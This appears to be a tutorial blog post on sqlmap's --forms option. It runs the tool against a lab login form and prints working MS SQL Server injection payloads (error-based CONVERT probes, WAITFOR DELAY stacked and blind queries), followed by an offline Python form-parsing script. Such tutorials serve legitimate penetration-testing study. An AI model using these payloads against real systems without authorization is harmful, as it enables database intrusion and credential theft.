Sqlmap : auto scanner form
Posted on 2012-10-7 20:28:40
Automatically find FORM elements and submit them
Example:
  root@Dis9Team:/tmp# GET http://5.5.5.3/index.htm
  <form name="frmLogin" action="post.asp" method="post">
  Username: <input type="text" name="userName">
  Password: <input type="text" name="password"><input type="submit"></form>

Keyword: form
  root@Dis9Team:~# sqlmap -u "http://5.5.5.3/index.htm" --forms
  [#1] form:
  POST http://5.5.5.3:80/post.asp
  POST data: userName=&password=
  do you want to test this form? [Y/n/q]
  >

Note: if a page has more than one form, take care to pick the right one.  [#1] form:
POST http://5.5.5.3:80/post.asp # POST is submitted to post.asp
POST data: userName=&password=  # the POST data
  Y
  Edit POST data [default: userName=&password=] (Warning: blank fields detected):
  do you want to fill blank fields with random values? [Y/n] Y
  [00:05:28] [INFO] resuming back-end DBMS 'microsoft sql server'
  [00:05:28] [INFO] using '/pen/sql/sqlmap/output/results-09112012_1205am.csv' as results file
  [00:05:28] [INFO] heuristics detected web page charset 'ascii'
  sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  ---
  Place: POST
  Parameter: password
      Type: error-based
      Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
      Payload: userName=1234567&password=123456' AND 2231=CONVERT(INT,(CHAR(58)+CHAR(115)+CHAR(115)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (2231=2231) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(108)+CHAR(110)+CHAR(103)+CHAR(58))) AND 'FpCN'='FpCN

      Type: stacked queries
      Title: Microsoft SQL Server/Sybase stacked queries
      Payload: userName=1234567&password=123456'; WAITFOR DELAY '0:0:5';--

      Type: AND/OR time-based blind
      Title: Microsoft SQL Server/Sybase time-based blind
      Payload: userName=1234567&password=123456' WAITFOR DELAY '0:0:5'--

  Place: POST
  Parameter: userName
      Type: error-based
      Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
      Payload: userName=1234567' AND 5821=CONVERT(INT,(CHAR(58)+CHAR(115)+CHAR(115)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (5821=5821) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(108)+CHAR(110)+CHAR(103)+CHAR(58))) AND 'Wdrp'='Wdrp&password=123456

      Type: stacked queries
      Title: Microsoft SQL Server/Sybase stacked queries
      Payload: userName=1234567'; WAITFOR DELAY '0:0:5';--&password=123456

      Type: AND/OR time-based blind
      Title: Microsoft SQL Server/Sybase time-based blind
      Payload: userName=1234567' WAITFOR DELAY '0:0:5'--&password=123456
  ---
  there were multiple injection points, please select the one to use for following injections:
  [0] place: POST, parameter: userName, type: Single quoted string (default)
  [1] place: POST, parameter: password, type: Single quoted string
  [q] Quit
  > 0
  do you want to exploit this SQL injection? [Y/n] Y
  [00:05:32] [INFO] the back-end DBMS is Microsoft SQL Server
  web server operating system: Windows 2003
  web application technology: ASP.NET, Microsoft IIS 6.0, ASP
  back-end DBMS: Microsoft SQL Server 2000
  [00:05:32] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/pen/sql/sqlmap/output/results-09112012_1205am.csv'
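As an added example (not part of the original post and not sqlmap's own code), the Python script below does the discovery step that `--forms` performs before it asks "do you want to test this form?": it parses the page for `<form>` elements, resolves each `action` against the page URL, turns the named inputs into a request data string, and flags blank fields, printing the result in the same `[#1] form:` shape as the sqlmap output above. Nothing is fetched from the network: the page HTML is the login form from the post embedded inline, plus a second constructed GET search form (an assumption, not on the original page) so that the multi-form numbering the note warns about is visible.

```python
"""List HTML forms the way `sqlmap --forms` presents them before testing.

Added example, not sqlmap code. Input is embedded below, so it runs offline.
"""
from html.parser import HTMLParser
from urllib.parse import urlencode, urljoin, urlsplit, urlunsplit

PAGE_URL = "http://5.5.5.3/index.htm"

# First form: the login form shown in the post. Second form: constructed
# (assumption) to show how a page with several forms gets numbered.
PAGE_HTML = """
<form name="frmLogin" action="post.asp" method="post">
Username: <input type="text" name="userName">
Password: <input type="text" name="password"><input type="submit"></form>
<form action="/search.asp">
<input type="hidden" name="lang" value="en">
<input type="text" name="q">
</form>
"""

DEFAULT_PORTS = {"http": 80, "https": 443}


class FormCollector(HTMLParser):
    """Collects method, action and named controls for every <form> on a page."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "method": (a.get("method") or "get").upper(),  # HTML default is GET
                "action": a.get("action") or "",              # empty action = same page
                "fields": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            name = a.get("name")
            # Unnamed controls (the bare submit button above) are never sent,
            # so they are not injection points either.
            if name:
                self._current["fields"].append((name, a.get("value") or ""))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def with_explicit_port(url):
    """Render http://host/path as http://host:80/path, as sqlmap prints targets."""
    parts = urlsplit(url)
    if parts.port is None and parts.scheme in DEFAULT_PORTS:
        parts = parts._replace(netloc=f"{parts.hostname}:{DEFAULT_PORTS[parts.scheme]}")
    return urlunsplit(parts)


def extract_forms(page_url, html):
    """Return one target dict per form: method, absolute URL, data string, blank fields."""
    parser = FormCollector()
    parser.feed(html)
    parser.close()
    targets = []
    for f in parser.forms:
        targets.append({
            "method": f["method"],
            "url": with_explicit_port(urljoin(page_url, f["action"])),
            "data": urlencode(f["fields"]),            # e.g. userName=&password=
            "blank_fields": [n for n, v in f["fields"] if v == ""],
        })
    return targets


def describe(targets):
    """Format targets as the '[#N] form:' listing sqlmap shows before testing."""
    lines = []
    for i, t in enumerate(targets, 1):
        lines.append(f"[#{i}] form:")
        if t["method"] == "POST":
            lines.append(f"POST {t['url']}")
            lines.append(f"POST data: {t['data']}")
        else:
            lines.append(f"GET {t['url']}?{t['data']}")
        if t["blank_fields"]:
            # sqlmap warns about these and offers to fill them with random values.
            lines.append("(Warning: blank fields detected: %s)" % ", ".join(t["blank_fields"]))
    return "\n".join(lines)


if __name__ == "__main__":
    print(describe(extract_forms(PAGE_URL, PAGE_HTML)))
```

The blank-field warning is the reason sqlmap asked whether to fill fields with random values: a login form submitted with empty `userName` and `password` often short-circuits server-side before the values reach the query, so the test payloads would never be evaluated.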
